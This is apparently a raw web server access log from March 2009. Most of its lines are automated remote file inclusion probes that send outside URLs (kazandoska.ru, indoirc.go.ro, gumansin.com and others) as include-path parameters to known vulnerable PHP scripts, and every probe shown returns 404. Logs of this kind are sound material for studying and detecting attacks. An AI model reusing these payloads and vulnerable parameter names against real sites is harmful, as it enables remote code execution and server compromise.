207.226.88.17 - - [11/Mar/2009:13:18:13 -0500] "GET /errors.php?error=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
77.91.201.31 - - [11/Mar/2009:13:24:35 -0500] "GET /logs//zb41/include/write.php?dir=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:13:24:35 -0500] "GET /logs/access_log.1231286400//zb41/include/write.php?dir=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:13:24:35 -0500] "GET //zb41/include/write.php?dir=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
65.55.208.130 - - [11/Mar/2009:13:32:57 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [11/Mar/2009:13:32:57 -0500] "GET /logs/access_log.1234742400 HTTP/1.1" 200 167874 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
207.226.88.17 - - [11/Mar/2009:13:41:41 -0500] "GET /logs/errors.php?error=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:13:41:41 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:13:41:42 -0500] "GET /errors.php?error=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:13:41:42 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.105.96.41 - - [11/Mar/2009:13:53:58 -0500] "GET //zb41/include/write.php?dir=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.105.96.41 - - [11/Mar/2009:13:53:58 -0500] "GET /logs//zb41/include/write.php?dir=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.105.96.41 - - [11/Mar/2009:13:53:58 -0500] "GET /logs/access_log.1231286400//zb41/include/write.php?dir=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
61.62.162.42 - - [11/Mar/2009:13:54:37 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
61.62.162.42 - - [11/Mar/2009:13:54:38 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
61.62.162.42 - - [11/Mar/2009:13:54:38 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
61.62.162.42 - - [11/Mar/2009:13:54:38 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
211.105.96.41 - - [11/Mar/2009:13:56:02 -0500] "GET /logs/access_log.1231804800//zb41/include/write.php?dir=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
74.57.99.81 - - [11/Mar/2009:13:57:08 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
74.57.99.81 - - [11/Mar/2009:13:57:08 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
80.179.149.111 - - [11/Mar/2009:13:57:39 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
80.179.149.111 - - [11/Mar/2009:13:57:39 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
80.179.149.111 - - [11/Mar/2009:13:57:39 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
80.179.149.111 - - [11/Mar/2009:13:57:39 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
194.183.15.230 - - [11/Mar/2009:14:02:34 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
194.183.15.230 - - [11/Mar/2009:14:02:34 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
194.183.15.230 - - [11/Mar/2009:14:02:34 -0500] "GET /logs/access_log.1231113600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
194.183.15.230 - - [11/Mar/2009:14:02:34 -0500] "GET /logs/access_log.1233792000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
77.221.130.17 - - [11/Mar/2009:14:07:45 -0500] "GET /logs//twindow_notice.php?shop_this_skin_path=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.221.130.17 - - [11/Mar/2009:14:07:45 -0500] "GET //twindow_notice.php?shop_this_skin_path=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
211.105.96.41 - - [11/Mar/2009:14:07:55 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.105.96.41 - - [11/Mar/2009:14:07:55 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.105.96.41 - - [11/Mar/2009:14:08:00 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
211.105.96.41 - - [11/Mar/2009:14:08:01 -0500] "GET /logs/access_log.1232755200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
211.220.195.71 - - [11/Mar/2009:14:13:19 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.220.195.71 - - [11/Mar/2009:14:13:19 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.220.195.71 - - [11/Mar/2009:14:13:19 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.220.195.71 - - [11/Mar/2009:14:13:36 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
81.169.143.242 - - [11/Mar/2009:14:17:56 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kazandoska.ru/id1v4.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
81.169.143.242 - - [11/Mar/2009:14:17:56 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kazandoska.ru/id1v4.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
81.169.143.242 - - [11/Mar/2009:14:17:56 -0500] "GET /logs/access_log.1231459200//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kazandoska.ru/id1v4.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
81.169.143.242 - - [11/Mar/2009:14:19:12 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
81.169.143.242 - - [11/Mar/2009:14:19:12 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
203.149.32.226 - - [11/Mar/2009:14:24:37 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sorncomputer.com/haxor/ss.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
203.149.32.226 - - [11/Mar/2009:14:24:48 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sorncomputer.com/haxor/ss.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
81.169.143.242 - - [11/Mar/2009:14:27:08 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.69"
81.169.143.242 - - [11/Mar/2009:14:27:08 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.69"
65.55.230.166 - - [11/Mar/2009:14:27:10 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.166 - - [11/Mar/2009:14:27:10 -0500] "GET /logs/access_log.1131580800 HTTP/1.1" 200 334 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
81.169.143.242 - - [11/Mar/2009:14:28:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://kazandoska.ru/id1v4.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
81.169.143.242 - - [11/Mar/2009:14:28:14 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kazandoska.ru/id1v4.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
81.169.143.242 - - [11/Mar/2009:14:28:14 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://kazandoska.ru/id1v4.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
81.169.143.242 - - [11/Mar/2009:14:28:48 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
81.169.143.242 - - [11/Mar/2009:14:28:48 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
80.179.149.111 - - [11/Mar/2009:14:32:18 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
80.179.149.111 - - [11/Mar/2009:14:32:19 -0500] "GET //modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
80.179.149.111 - - [11/Mar/2009:14:32:45 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
80.179.149.111 - - [11/Mar/2009:14:32:45 -0500] "GET //modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
81.169.143.242 - - [11/Mar/2009:14:32:47 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kazandoska.ru/id1v4.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
81.169.143.242 - - [11/Mar/2009:14:32:57 -0500] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kazandoska.ru/id1v4.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
194.183.15.230 - - [11/Mar/2009:14:35:04 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
207.226.88.17 - - [11/Mar/2009:14:35:18 -0500] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:14:35:18 -0500] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:14:35:18 -0500] "GET /includes/functions_admin.php?phpbb_root_path=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:14:35:18 -0500] "GET /includes/functions_admin.php?phpbb_root_path=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:14:37:21 -0500] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:14:37:21 -0500] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:14:37:21 -0500] "GET /includes/functions_admin.php?phpbb_root_path=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:14:37:21 -0500] "GET /includes/functions_admin.php?phpbb_root_path=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
194.183.15.230 - - [11/Mar/2009:14:37:42 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
69.65.122.96 - - [11/Mar/2009:14:39:16 -0500] "GET /logs/errors.php?error=http://kunming.kr/kboard/data/_members/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:14:39:16 -0500] "GET /errors.php?error=http://kunming.kr/kboard/data/_members/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:14:39:23 -0500] "GET /logs/errors.php?error=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:14:39:23 -0500] "GET /errors.php?error=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:14:39:24 -0500] "GET /logs/errors.php?error=http://kunming.kr/kboard/data/_members/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:14:39:24 -0500] "GET /errors.php?error=http://kunming.kr/kboard/data/_members/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:14:39:35 -0500] "GET /logs/errors.php?error=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:14:39:35 -0500] "GET /errors.php?error=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
194.183.15.230 - - [11/Mar/2009:14:40:03 -0500] "GET /logs/access_log.1231545600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
194.183.15.230 - - [11/Mar/2009:14:40:03 -0500] "GET /logs/access_log.1231459200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
194.183.15.230 - - [11/Mar/2009:14:40:39 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
85.119.154.60 - - [11/Mar/2009:14:41:05 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://hredu.net/bbs/skin/zero_vote/images/idoke.txt??? HTTP/1.0" 404 302 "-""libwww-perl/5.48"
85.119.154.60 - - [11/Mar/2009:14:41:06 -0500] "GET //include/admin.lib.inc.php?site_path=http://hredu.net/bbs/skin/zero_vote/images/idoke.txt??? HTTP/1.0" 404 297 "-""libwww-perl/5.48"
209.188.21.248 - - [11/Mar/2009:14:42:04 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 317 "-""libwww-perl/5.813"
209.188.21.248 - - [11/Mar/2009:14:42:05 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 312 "-""libwww-perl/5.813"
74.57.99.81 - - [11/Mar/2009:14:42:27 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
74.57.99.81 - - [11/Mar/2009:14:42:32 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
74.57.99.81 - - [11/Mar/2009:14:44:41 -0500] "GET /logs//send_reminders.php?includedir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
74.57.99.81 - - [11/Mar/2009:14:44:41 -0500] "GET //send_reminders.php?includedir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
74.57.99.81 - - [11/Mar/2009:14:45:00 -0500] "GET /logs//send_reminders.php?includedir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
74.57.99.81 - - [11/Mar/2009:14:45:05 -0500] "GET //send_reminders.php?includedir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.169.143.242 - - [11/Mar/2009:14:45:23 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.69"
81.169.143.242 - - [11/Mar/2009:14:45:23 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.69"
212.112.227.88 - - [11/Mar/2009:14:45:48 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
212.112.227.88 - - [11/Mar/2009:14:45:49 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
81.169.143.242 - - [11/Mar/2009:14:47:08 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
81.169.143.242 - - [11/Mar/2009:14:47:08 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
81.169.143.242 - - [11/Mar/2009:14:47:26 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
81.169.143.242 - - [11/Mar/2009:14:47:27 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
81.169.143.242 - - [11/Mar/2009:14:52:04 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kazandoska.ru/id1v4.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
81.169.143.242 - - [11/Mar/2009:14:52:04 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kazandoska.ru/id1v4.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
81.169.143.242 - - [11/Mar/2009:14:52:04 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kazandoska.ru/id1v4.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
209.85.14.66 - - [11/Mar/2009:14:52:52 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://dragonz.altervista.org/mmmmid.txt????? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
209.85.14.66 - - [11/Mar/2009:14:52:52 -0500] "GET /lostpasswd.php?env[include_prefix]=http://dragonz.altervista.org/mmmmid.txt????? HTTP/1.1" 404 297 "-""libwww-perl/5.811"
74.57.99.81 - - [11/Mar/2009:14:53:24 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
74.57.99.81 - - [11/Mar/2009:14:54:05 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
74.57.99.81 - - [11/Mar/2009:14:54:06 -0500] "GET //modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
81.169.143.242 - - [11/Mar/2009:14:55:10 -0500] "GET /logs/access_log.1232841600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kazandoska.ru/id1v4.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
61.63.90.81 - - [11/Mar/2009:15:01:48 -0500] "GET //include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
61.63.90.81 - - [11/Mar/2009:15:01:48 -0500] "GET /logs//include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
61.63.90.81 - - [11/Mar/2009:15:01:48 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
69.27.110.65 - - [11/Mar/2009:15:02:05 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://viparenda.ru/includes/images/safe.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.65"
69.27.110.65 - - [11/Mar/2009:15:02:05 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://viparenda.ru/includes/images/safe.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
61.63.90.81 - - [11/Mar/2009:15:02:06 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
74.57.99.81 - - [11/Mar/2009:15:03:26 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
211.202.2.220 - - [11/Mar/2009:15:05:58 -0500] "GET //inc/Common.inc.php?class_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.202.2.220 - - [11/Mar/2009:15:05:58 -0500] "GET /logs//inc/Common.inc.php?class_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.202.2.220 - - [11/Mar/2009:15:05:58 -0500] "GET /logs/access_log.1233014400//inc/Common.inc.php?class_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
62.44.70.253 - - [11/Mar/2009:15:14:12 -0500] "GET /logs//include/lib.inc.php?site_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:15:14:12 -0500] "GET //include/lib.inc.php?site_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.65"
74.205.119.226 - - [11/Mar/2009:15:14:44 -0500] "GET ///vwar/backup/errors.php?error=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:15:14:44 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:15:14:44 -0500] "GET /logs/access_log.1225238400///vwar/backup/errors.php?error=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:15:14:45 -0500] "GET ///vwar/backup/errors.php?error=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:15:14:45 -0500] "GET /logs///vwar/backup/errors.php?error=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:15:14:45 -0500] "GET /logs/access_log.1225238400///vwar/backup/errors.php?error=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
